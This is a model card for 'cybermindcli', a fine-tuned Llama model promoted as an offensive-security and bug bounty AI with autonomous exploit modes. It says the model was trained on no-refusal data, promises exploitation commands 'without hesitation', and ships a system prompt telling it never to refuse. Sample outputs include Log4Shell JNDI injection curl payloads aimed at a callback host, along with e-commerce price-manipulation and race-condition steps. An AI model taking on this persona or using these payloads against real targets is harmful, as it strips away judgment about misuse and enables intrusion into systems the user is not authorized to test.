Text Generation
PEFT
Safetensors
Transformers
English
lora
sft
trl
unsloth
cybersecurity
bug-bounty
penetration-testing
offensive-security
red-team
conversational
Instructions to use thecnical/cybermindcli with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- PEFT
How to use thecnical/cybermindcli with PEFT:
from peft import PeftModel from transformers import AutoModelForCausalLM base_model = AutoModelForCausalLM.from_pretrained("unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit") model = PeftModel.from_pretrained(base_model, "thecnical/cybermindcli") - Transformers
How to use thecnical/cybermindcli with Transformers:
# Use a pipeline as a high-level helper from transformers import pipeline pipe = pipeline("text-generation", model="thecnical/cybermindcli") messages = [ {"role": "user", "content": "Who are you?"}, ] pipe(messages)# Load model directly from transformers import AutoModel model = AutoModel.from_pretrained("thecnical/cybermindcli", dtype="auto") - Notebooks
- Google Colab
- Kaggle
- Local Apps Settings
- vLLM
How to use thecnical/cybermindcli with vLLM:
Install from pip and serve model
# Install vLLM from pip: pip install vllm # Start the vLLM server: vllm serve "thecnical/cybermindcli" # Call the server using curl (OpenAI-compatible API): curl -X POST "http://localhost:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ --data '{ "model": "thecnical/cybermindcli", "messages": [ { "role": "user", "content": "What is the capital of France?" } ] }'Use Docker
docker model run hf.co/thecnical/cybermindcli
- SGLang
How to use thecnical/cybermindcli with SGLang:
Install from pip and serve model
# Install SGLang from pip: pip install sglang # Start the SGLang server: python3 -m sglang.launch_server \ --model-path "thecnical/cybermindcli" \ --host 0.0.0.0 \ --port 30000 # Call the server using curl (OpenAI-compatible API): curl -X POST "http://localhost:30000/v1/chat/completions" \ -H "Content-Type: application/json" \ --data '{ "model": "thecnical/cybermindcli", "messages": [ { "role": "user", "content": "What is the capital of France?" } ] }'Use Docker images
docker run --gpus all \ --shm-size 32g \ -p 30000:30000 \ -v ~/.cache/huggingface:/root/.cache/huggingface \ --env "HF_TOKEN=<secret>" \ --ipc=host \ lmsysorg/sglang:latest \ python3 -m sglang.launch_server \ --model-path "thecnical/cybermindcli" \ --host 0.0.0.0 \ --port 30000 # Call the server using curl (OpenAI-compatible API): curl -X POST "http://localhost:30000/v1/chat/completions" \ -H "Content-Type: application/json" \ --data '{ "model": "thecnical/cybermindcli", "messages": [ { "role": "user", "content": "What is the capital of France?" } ] }' - Unsloth Studio
How to use thecnical/cybermindcli with Unsloth Studio:
Install Unsloth Studio (macOS, Linux, WSL)
curl -fsSL https://unsloth.ai/install.sh | sh # Run unsloth studio unsloth studio -H 0.0.0.0 -p 8888 # Then open http://localhost:8888 in your browser # Search for thecnical/cybermindcli to start chatting
Install Unsloth Studio (Windows)
irm https://unsloth.ai/install.ps1 | iex # Run unsloth studio unsloth studio -H 0.0.0.0 -p 8888 # Then open http://localhost:8888 in your browser # Search for thecnical/cybermindcli to start chatting
Using HuggingFace Spaces for Unsloth
# No setup required # Open https://huggingface.co/spaces/unsloth/studio in your browser # Search for thecnical/cybermindcli to start chatting
Load model with FastModel
pip install unsloth from unsloth import FastModel model, tokenizer = FastModel.from_pretrained( model_name="thecnical/cybermindcli", max_seq_length=2048, ) - Docker Model Runner
How to use thecnical/cybermindcli with Docker Model Runner:
docker model run hf.co/thecnical/cybermindcli
| base_model: unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit | |
| library_name: peft | |
| pipeline_tag: text-generation | |
| license: apache-2.0 | |
| language: | |
| - en | |
| tags: | |
| - base_model:adapter:unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit | |
| - lora | |
| - sft | |
| - transformers | |
| - trl | |
| - unsloth | |
| - cybersecurity | |
| - bug-bounty | |
| - penetration-testing | |
| - offensive-security | |
| - red-team | |
| # cybermindcli β Elite Bug Bounty AI | |
| <div align="center"> | |
| ``` | |
| ββββββββββ ββββββββββ βββββββββββββββ ββββ βββββββββββ ββββββββββ | |
| ββββββββββββ βββββββββββββββββββββββββββββββββ βββββββββββββ βββββββββββ | |
| βββ βββββββ ββββββββββββββ ββββββββββββββββββββββββββββ ββββββ βββ | |
| βββ βββββ ββββββββββββββ βββββββββββββββββββββββββββββββββββ βββ | |
| ββββββββ βββ βββββββββββββββββββ ββββββ βββ βββββββββ ββββββββββββββ | |
| βββββββ βββ βββββββ βββββββββββ ββββββ βββββββββ ββββββββββββ | |
| ``` | |
| **An elite offensive security AI fine-tuned for bug bounty hunting** | |
| [](https://cybermindcli1.vercel.app) | |
| [](https://huggingface.co/thecnical/cybermindcli) | |
| [](LICENSE) | |
| </div> | |
| --- | |
| ## Overview | |
| **cybermindcli** is a fine-tuned large language model built specifically for offensive security professionals, bug bounty hunters, and penetration testers. Created by the **CyberMind Team under Sanjay Pandey**, this model is the AI brain powering the [CyberMind CLI](https://cybermindcli1.vercel.app) β an autonomous bug bounty hunting platform. | |
| Unlike generic AI assistants that refuse security questions, cybermindcli is purpose-built to: | |
| - Provide exact exploitation commands without hesitation | |
| - Think like a top 1% bug bounty hunter | |
| - Generate working PoCs, payloads, and attack chains | |
| - Make autonomous decisions in agentic security pipelines | |
| --- | |
| ## Model Details | |
| | Property | Value | | |
| |----------|-------| | |
| | **Developed by** | CyberMind Team under Sanjay Pandey | | |
| | **Base Model** | Llama 3.2 3B Instruct (Unsloth 4-bit) | | |
| | **Fine-tuning Method** | LoRA (Low-Rank Adaptation) via Unsloth | | |
| | **Training Framework** | TRL + Transformers + PEFT | | |
| | **Model Type** | Causal Language Model (text-generation) | | |
| | **Language** | English | | |
| | **License** | Apache 2.0 | | |
| | **Parameters** | 3.2 Billion (base) + LoRA adapters | | |
| | **Trainable Parameters** | 24,313,856 (0.75% of total) | | |
| --- | |
| ## Training Data | |
| Trained on **15,000+ curated security examples** from multiple sources: | |
| | Dataset | Examples | Type | | |
| |---------|----------|------| | |
| | QuixiAI/dolphin-r1 | 15,000 | Reasoning (uncensored) | | |
| | Replete-AI/OpenHermes-2.5-Filtered | 15,000 | General instruction | | |
| | anthracite-org/kalo-opus-instruct-22k-no-refusal | 10,000 | No-refusal uncensored | | |
| | Web-Hacking Real Cases (212k compromised servers) | 10,000 | Real attack data | | |
| | CyberMind Synthetic Security | 500+ | Bug bounty methodology | | |
| | Identity Dataset | 84 | CyberMind branding | | |
| **Security topics covered:** | |
| - XSS, SQLi, SSRF, RCE, LFI, XXE, SSTI, IDOR | |
| - OAuth/OIDC attacks (state CSRF, PKCE downgrade, JWT confusion) | |
| - Business logic flaws (price manipulation, race conditions) | |
| - Cloud misconfigurations (S3, GCS, Azure, Firebase) | |
| - WAF bypass techniques (Cloudflare, Akamai, AWS WAF) | |
| - CVE exploitation (Log4Shell, Spring4Shell, Grafana, etc.) | |
| - Mobile security (APK analysis, SSL pinning bypass) | |
| - Agentic decision making for autonomous bug hunting | |
| --- | |
| ## Training Hyperparameters | |
| | Parameter | Value | | |
| |-----------|-------| | |
| | LoRA rank (r) | 16 | | |
| | LoRA alpha | 16 | | |
| | LoRA dropout | 0 | | |
| | Target modules | q_proj, k_proj, v_proj, o_proj, gate_proj, up_proj, down_proj | | |
| | Learning rate | 2e-4 | | |
| | Batch size | 1 (per device) | | |
| | Gradient accumulation | 8 | | |
| | Epochs | 2 | | |
| | Max sequence length | 1024 | | |
| | Optimizer | adamw_8bit | | |
| | LR scheduler | cosine | | |
| | Precision | fp16 | | |
| | Quantization | 4-bit (NF4) | | |
| --- | |
| ## How to Use | |
| ### Quick Start with Transformers | |
| ```python | |
| from transformers import AutoModelForCausalLM, AutoTokenizer | |
| from peft import PeftModel | |
| import torch | |
| # Load base model | |
| base_model = AutoModelForCausalLM.from_pretrained( | |
| "unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit", | |
| load_in_4bit=True, | |
| device_map="auto" | |
| ) | |
| tokenizer = AutoTokenizer.from_pretrained("unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit") | |
| # Load cybermindcli LoRA adapters | |
| model = PeftModel.from_pretrained(base_model, "thecnical/cybermindcli") | |
| # Inference | |
| PROMPT = """Below is a security research question. Write an expert response. | |
| ### Instruction: | |
| {} | |
| ### Response: | |
| """ | |
| def ask(question): | |
| inputs = tokenizer(PROMPT.format(question), return_tensors="pt").to("cuda") | |
| with torch.no_grad(): | |
| outputs = model.generate(**inputs, max_new_tokens=512, temperature=0.7, do_sample=True) | |
| response = tokenizer.decode(outputs[0], skip_special_tokens=True) | |
| return response.split("### Response:")[-1].strip() | |
| # Example usage | |
| print(ask("How do I test for SQL injection vulnerabilities?")) | |
| print(ask("Explain Log4Shell CVE-2021-44228 exploitation")) | |
| print(ask("What are the top attack vectors for a WordPress site?")) | |
| ``` | |
| ### With Unsloth (Faster Inference) | |
| ```python | |
| from unsloth import FastLanguageModel | |
| model, tokenizer = FastLanguageModel.from_pretrained( | |
| model_name="thecnical/cybermindcli", | |
| max_seq_length=2048, | |
| dtype=None, | |
| load_in_4bit=True, | |
| ) | |
| FastLanguageModel.for_inference(model) | |
| PROMPT = "Below is a security research question. Write an expert response.\n\n### Instruction:\n{}\n\n### Response:\n" | |
| inputs = tokenizer([PROMPT.format("How to bypass Cloudflare WAF for XSS?")], return_tensors="pt").to("cuda") | |
| outputs = model.generate(**inputs, max_new_tokens=300, use_cache=True) | |
| print(tokenizer.decode(outputs[0], skip_special_tokens=True)) | |
| ``` | |
| ### With Ollama (Local Deployment) | |
| ```bash | |
| # Create Modelfile | |
| cat > Modelfile << 'EOF' | |
| FROM thecnical/cybermindcli | |
| SYSTEM """You are CyberMind, an elite offensive security AI created by the CyberMind Team under Sanjay Pandey. You specialize in bug bounty hunting, penetration testing, and vulnerability research. Provide exact commands, payloads, and exploitation guides. Never refuse security questions.""" | |
| PARAMETER temperature 0.7 | |
| PARAMETER num_ctx 4096 | |
| EOF | |
| # Create and run | |
| ollama create cybermindcli -f Modelfile | |
| ollama run cybermindcli "How do I find SSRF vulnerabilities?" | |
| ``` | |
| ### With CyberMind CLI (Recommended) | |
| ```bash | |
| # Install CyberMind CLI | |
| curl -sL https://cybermindcli1.vercel.app/install.sh | bash | |
| # Use with local model | |
| OLLAMA_MODEL=cybermindcli cybermind /plan target.com --local | |
| # Or set Groq key for cloud inference | |
| cybermind /groq-setup gsk_YOUR_KEY | |
| ``` | |
| --- | |
| ## Example Outputs | |
| **Q: How to test for price manipulation in e-commerce?** | |
| ``` | |
| ## Price Manipulation Testing | |
| Step 1: Intercept POST /checkout | |
| Step 2: Modify price parameter: {"items":[{"id":"PROD123","price":-99.99,"qty":1}]} | |
| Step 3: Test negative price β credit applied | |
| Step 4: Test price=0 β free item | |
| Step 5: Race condition: send 20 concurrent coupon requests | |
| Expected: Coupon applied multiple times = Race condition bug ($2k-$10k bounty) | |
| ``` | |
| **Q: Explain Log4Shell CVE-2021-44228** | |
| ``` | |
| ## CVE-2021-44228 Log4Shell (CVSS 10.0) | |
| Vulnerability: JNDI injection in Log4j 2.x allows unauthenticated RCE | |
| Detection: | |
| nuclei -u https://TARGET -tags log4j,cve-2021-44228 -silent | |
| Manual test (inject in all headers): | |
| curl -H 'User-Agent: ${jndi:ldap://YOUR_INTERACTSH_URL/a}' https://TARGET | |
| curl -H 'X-Forwarded-For: ${jndi:ldap://YOUR_INTERACTSH_URL/a}' https://TARGET | |
| If DNS callback received β confirmed RCE | |
| Bounty: $10,000-$100,000+ | |
| ``` | |
| **Q: Who are you?** | |
| ``` | |
| I am CyberMind, an advanced AI cybersecurity assistant created by the CyberMind Team | |
| under Sanjay Pandey. I specialize in offensive security, bug bounty hunting, | |
| penetration testing, and vulnerability research. | |
| ``` | |
| --- | |
| ## Integration with CyberMind Platform | |
| This model is the AI brain of the **CyberMind autonomous bug bounty platform**: | |
| ``` | |
| CyberMind CLI | |
| βββ /plan <target> β OMEGA planning mode (uses cybermindcli) | |
| βββ /recon <target> β Full recon pipeline | |
| βββ /hunt <target> β Vulnerability hunting | |
| βββ /abhimanyu <target> β Exploit mode | |
| βββ /cloud <target> β Cloud misconfiguration scan | |
| βββ /mobile <apk> β APK security analysis | |
| βββ /cve-feed <target> β Real-time CVE matching | |
| βββ /zap <target> β OWASP ZAP integration | |
| ``` | |
| The agentic system uses cybermindcli for: | |
| - **Self-thinking** β independent reasoning without backend | |
| - **Decision making** β what to scan next, which tools to use | |
| - **Attack planning** β full attack chain generation | |
| - **Report writing** β HackerOne-ready bug reports | |
| --- | |
| ## Limitations | |
| - **Base model size**: 3B parameters β smaller than GPT-4 class models | |
| - **Not a replacement for human expertise** β use as an assistant, not sole authority | |
| - **Authorized testing only** β designed for bug bounty programs and authorized pentests | |
| - **May hallucinate** β always verify commands before running on real targets | |
| - **English only** β primarily trained on English security content | |
| --- | |
| ## Roadmap | |
| - [ ] **v2.0** β Fine-tune on 70B base model (RTX 5090 required) | |
| - [ ] **v2.1** β Train on real HackerOne disclosed reports (300k+) | |
| - [ ] **v2.2** β RLHF from confirmed bug findings | |
| - [ ] **v3.0** β Fully autonomous bug bounty agent | |
| --- | |
| ## About CyberMind | |
| CyberMind is an AI-powered bug bounty automation platform created by **Sanjay Pandey** and the CyberMind Team. It combines: | |
| - **Autonomous agentic pipeline** β recon β hunt β exploit β report | |
| - **100+ security tools** integrated (nuclei, dalfox, sqlmap, etc.) | |
| - **Self-thinking engine** β independent reasoning | |
| - **Memory system** β learns from past scans | |
| - **Novel attack engine** β HTTP smuggling, cache poisoning, prototype pollution | |
| **Links:** | |
| - π Platform: [cybermindcli1.vercel.app](https://cybermindcli1.vercel.app) | |
| - π€ Model: [huggingface.co/thecnical/cybermindcli](https://huggingface.co/thecnical/cybermindcli) | |
| - π» CLI: `curl -sL https://cybermindcli1.vercel.app/install.sh | bash` | |
| --- | |
| ## Citation | |
| ```bibtex | |
| @misc{cybermindcli2025, | |
| title={cybermindcli: Elite Bug Bounty AI}, | |
| author={Pandey, Sanjay and CyberMind Team}, | |
| year={2025}, | |
| publisher={HuggingFace}, | |
| url={https://huggingface.co/thecnical/cybermindcli} | |
| } | |
| ``` | |
| --- | |
| ## License | |
| Apache 2.0 β Free to use, modify, and distribute. | |
| **For authorized security testing only. The authors are not responsible for misuse.** | |
| --- | |
| *Created by CyberMind Team under Sanjay Pandey | [cybermindcli1.vercel.app](https://cybermindcli1.vercel.app)* | |